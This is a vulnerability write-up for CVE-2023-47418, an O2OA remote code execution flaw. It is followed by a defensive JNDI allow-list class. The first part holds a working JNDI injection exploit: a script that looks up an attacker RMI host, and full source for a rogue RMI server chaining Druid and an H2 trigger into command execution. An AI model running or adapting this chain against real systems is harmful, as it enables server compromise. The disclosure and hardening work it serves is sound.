CVE-2023-47418: GitHub - Onlyning/O2OA

Remote Code Execution (RCE) vulnerability in o2oa version 8.1.2 and before, allows attackers to create a new interface in the service management function to execute JavaScript.



OA remote code execution

1. After logging in as an administrator, open Service Management and create a new interface.

2. In the interface, write a script that performs a JNDI lookup:

var poc=new javax.naming.InitialContext().lookup("rmi://192.168.1.4:1099/zlgExploit");

3. Start the JNDI RMI server (the JNDIRmiServer.jar in the project can be used to start the RMI server: java -jar JNDIRmiServer.jar; once it is running, enter rmi://yourip:1099/zlgExploit in the payload).

The server code is as follows:

package com.best.hello.controller.JNDI;


import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;

import javax.naming.InitialContext;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import java.rmi.Naming;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.RemoteObject;

// JNDI + RMI server
// rmi://127.0.0.1:1099/Object
public class JNDIRmiServer {
    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.createRegistry(1099);
        Reference ref = new Reference("javax.sql.DataSource","com.alibaba.druid.pool.DruidDataSourceFactory",null);
        String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
                "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
                "java.lang.Runtime.getRuntime().exec('cmd /c calc.exe')\n" +
                "$$\n";
        String JDBC_USER = "root";
        String JDBC_PASSWORD = "password";

        ref.add(new StringRefAddr("driverClassName","org.h2.Driver"));
        ref.add(new StringRefAddr("url",JDBC_URL));
        ref.add(new StringRefAddr("username",JDBC_USER));
        ref.add(new StringRefAddr("password",JDBC_PASSWORD));
        ref.add(new StringRefAddr("initialSize","1"));
        ref.add(new StringRefAddr("init","true"));
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);

        Naming.bind("rmi://0.0.0.0:1099/zlgExploit",referenceWrapper);

    }
}

After the script is run from the O2OA web interface, as shown in the figure below, the command executes successfully and the calculator pops up.
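Note that the PoC server never needs a remote codebase: the RMI registry hands back a javax.naming.Reference whose factory class (com.alibaba.druid.pool.DruidDataSourceFactory) the PoC relies on being loadable from the target's own classpath, so the JDK's default com.sun.jndi.rmi.object.trustURLCodebase=false does not stop it. As an added hardening example, not code from the PoC repository or from O2OA, the following javax.naming.spi.ObjectFactoryBuilder allow-lists factory classes before any Reference is resolved; the class name, allow list contents and install point are assumptions.

```java
import java.util.Hashtable;
import java.util.Set;
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.spi.NamingManager;
import javax.naming.spi.ObjectFactory;
import javax.naming.spi.ObjectFactoryBuilder;

// Hypothetical JVM-wide guard (not O2OA code): after install(), a JNDI lookup that
// returns a javax.naming.Reference is materialised only if its factory class is on
// the allow list; anything else (e.g. DruidDataSourceFactory handed back by a rogue
// RMI registry) is refused and logged. Install once, at startup, before any lookup.
public final class JndiReferenceGuard implements ObjectFactoryBuilder, ObjectFactory {
    // Assumed allow list: fill it with the factories this deployment legitimately
    // uses (typically the servlet container's own JNDI resource factories).
    private final Set<String> allowedFactories;
    private JndiReferenceGuard(Set<String> allowed) { this.allowedFactories = allowed; }

    public static void install(Set<String> allowed) throws NamingException {
        // NamingManager accepts a single builder per JVM; a second call throws.
        NamingManager.setObjectFactoryBuilder(new JndiReferenceGuard(allowed));
    }

    @Override // ObjectFactoryBuilder: every Reference resolution is routed here
    public ObjectFactory createObjectFactory(Object obj, Hashtable<?, ?> env) {
        return this;
    }

    @Override // ObjectFactory: decide whether this Reference may be resolved
    public Object getObjectInstance(Object obj, Name name, Context ctx,
                                    Hashtable<?, ?> env) throws Exception {
        if (!(obj instanceof Reference)) {
            return obj;  // non-Reference lookup results pass through unchanged
        }
        Reference ref = (Reference) obj;
        String factory = ref.getFactoryClassName();
        if (factory == null || !allowedFactories.contains(factory)) {
            // Detection hook: factory and target class identify what was attempted.
            System.err.println("Blocked JNDI Reference: factory=" + factory
                    + " class=" + ref.getClassName() + " name=" + name);
            throw new NamingException("JNDI Reference factory not allowed: " + factory);
        }
        // Allowed: load the factory from the local classpath ourselves; the Reference's
        // factory class location (remote codebase) is deliberately never consulted.
        ClassLoader cl = Thread.currentThread().getContextClassLoader();
        ObjectFactory f = (ObjectFactory) Class.forName(factory, true, cl)
                .getDeclaredConstructor().newInstance();
        return f.getObjectInstance(ref, name, ctx, env);
    }
}
```

This complements, rather than replaces, restricting which accounts may create interfaces and what the server-side script engine is allowed to reach.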
